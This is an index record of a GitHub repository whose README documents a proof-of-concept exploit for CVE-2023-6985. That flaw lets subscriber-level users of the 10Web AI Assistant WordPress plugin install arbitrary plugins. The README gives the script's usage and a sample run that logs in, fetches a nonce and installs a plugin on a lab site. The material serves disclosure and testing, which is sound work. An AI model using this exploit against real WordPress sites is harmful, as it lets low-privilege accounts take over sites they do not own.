{"id":21125689,"url":"https://github.com/randomrobbiebf/cve-2023-6985","last_synced_at":"2026-05-17T21:10:06.341Z","repository":{"id":219785319,"uuid":"749919472","full_name":"RandomRobbieBF/CVE-2023-6985","owner":"RandomRobbieBF","description":"10Web AI Assistant – AI content writing assistant \u003c= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation Description","archived":false,"fork":false,"pushed_at":"2024-01-29T16:54:24.000Z","size":7,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-09-22T14:02:24.299Z","etag":null,"topics":["ai-assistant-by-10web","cve-2023-6985","wordpress"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2024-01-29T16:51:53.000Z","updated_at":"2024-07-11T16:39:17.000Z","dependencies_parsed_at":"2024-01-29T20:14:40.176Z","dependency_job_id":"e43da894-1fd6-492c-897f-81c9ffd650d6","html_url":"https://github.com/RandomRobbieBF/CVE-2023-6985","commit_stats":null,"previous_names":["randomrobbiebf/cve-2023-6985"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2023-6985","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6985","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6985/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6985/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6985/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2023-6985/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-6985/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":33155543,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-17T09:28:26.183Z","status":"ssl_error","status_checked_at":"2026-05-17T09:27:52.702Z","response_time":107,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ai-assistant-by-10web","cve-2023-6985","wordpress"],"created_at":"2024-11-20T04:36:21.930Z","updated_at":"2026-05-17T21:10:06.305Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2023-6985\n10Web AI Assistant – AI content writing assistant \u0026lt;= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation Description\n\n\n### Description\n\nThe 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.\n\n```\nSeverity: medium\nCVE ID: CVE-2023-6985\nCVSS Score: 6.5\nCVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\nPlugin Slug: ai-assistant-by-10web\nWPScan URL: https://www.wpscan.com/plugin/ai-assistant-by-10web\nReference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/229245a5-468d-47b9-8f26-d23d593e91da\nDiff URL: https://plugins.trac.wordpress.org/changeset/3027004/ai-assistant-by-10web/trunk/ai-assistant-by-10web.php\nDownload Vuln: https://downloads.wordpress.org/plugin/ai-assistant-by-10web.1.0.18.zip\n```\n\nHow to use\n---\n\n```\npython3 CVE-2023-6985.py -h\nusage: CVE-2023-6985.py [-h] --url URL --username USERNAME --password PASSWORD --slug SLUG --php PHP\n\n10Web AI Assistant – AI content writing assistant \u003c= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation Description CVE-2023-6985 - The 10Web AI Assistant – AI\ncontent writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18.\nThis makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site.\n\noptions:\n  -h, --help           show this help message and exit\n  --url URL            URL of the WordPress site\n  --username USERNAME  WordPress username\n  --password PASSWORD  WordPress password\n  --slug SLUG          WordPress Plugin Slug\n  --php PHP            WordPress Plugin PHP file\n```\n\nPOC\n---\n\n```\npython3 CVE-2023-6985.py --url http://wordpress.lan --username user --password useruser1 --slug display-php-version --php display-php-version.php\nLogged in successfully.\nGetting REST API Nonce!\nNonce Found: df8390ff4b\nInstalling Plugin\nDownloading installation package from https://downloads.wordpress.org/plugin/display-php-version.latest-stable.zip\nUnpacking the package\nInstalling the plugin\nPlugin installed successfully.\n{\"success\":true}\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-6985","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2023-6985","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-6985/lists"}